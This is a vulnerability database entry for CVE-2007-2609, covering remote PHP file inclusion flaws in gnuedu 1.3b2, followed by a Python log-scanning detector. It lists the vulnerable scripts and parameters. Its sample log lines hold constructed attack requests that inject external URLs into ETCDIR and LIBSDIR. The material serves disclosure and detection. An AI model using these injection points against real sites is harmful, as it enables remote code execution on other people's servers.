CVE-2007-2609
gnu_edu 1.3b2 - Remote Code Execution via PHP File Inclusion
Exploitation Summary
EIP tracks 1 public exploit for CVE-2007-2609. PoCs published by GoLd_M.
AI-analyzed exploit summary: This is a writeup detailing multiple remote file inclusion vulnerabilities in gnuedu 1.3b2. It lists various endpoints where the ETCDIR or LIBSDIR parameters can be manipulated to include arbitrary files.
Description
Multiple PHP remote file inclusion vulnerabilities in gnuedu 1.3b2 allow remote attackers to execute arbitrary PHP code via a URL in the (a) ETCDIR parameter to (1) libs/lom.php; (2) lom_update.php, (3) check-lom.php, and (4) weigh_keywords.php in scripts/; the (b) LIBSDIR parameter to (5) logout.php, (6) help.php, (7) index.php, (8) login.php; and the ETCDIR parameter to (9) web/lom.php.
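A defensive check for the request pattern in the description above, as an added example (not code from gnuedu or from the published writeup): it scans web-server access log lines for the listed scripts receiving a URL in the ETCDIR or LIBSDIR parameter. The log lines, the `/gnuedu/` install path and the `host.invalid` names are constructed; the scripts are matched by file name because the page does not give a directory for all of them.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter -> script names, taken from the CVE description above.
AFFECTED = {
    "ETCDIR": {"lom.php", "lom_update.php", "check-lom.php", "weigh_keywords.php"},
    "LIBSDIR": {"logout.php", "help.php", "index.php", "login.php"},
}
# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme (http://, https://, ftp://, ...).
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# Constructed sample input (documentation addresses, non-resolving host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/May/2007:10:00:01 +0000] "GET /gnuedu/web/index.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/May/2007:10:02:13 +0000] "GET /gnuedu/libs/lom.php?ETCDIR=http://host.invalid/x HTTP/1.1" 200 312',
    '192.0.2.44 - - [10/May/2007:10:02:15 +0000] "GET /gnuedu/web/login.php?LIBSDIR=ftp%3A%2F%2Fhost.invalid%2Fx HTTP/1.0" 200 298',
    '192.0.2.10 - - [10/May/2007:10:03:40 +0000] "GET /gnuedu/web/help.php?topic=ETCDIR HTTP/1.1" 200 2048',
]


def find_rfi_attempts(lines):
    """Return (line_number, script, parameter, decoded_value) per suspicious request.

    Only query strings are inspected: values sent in a POST body do not
    appear in an access log and need request-body logging or a WAF rule.
    """
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a recognisable request line
        target = urlsplit(match.group(1))
        script = target.path.rsplit("/", 1)[-1].lower()
        # parse_qsl percent-decodes names and values once, as PHP would.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            scripts = AFFECTED.get(name)  # PHP variable names are case-sensitive
            if scripts and script in scripts and SCHEME_RE.match(value.strip()):
                hits.append((number, script, name, value))
    return hits


if __name__ == "__main__":
    for number, script, name, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"line {number}: {script} received URL in {name}: {value}")
```
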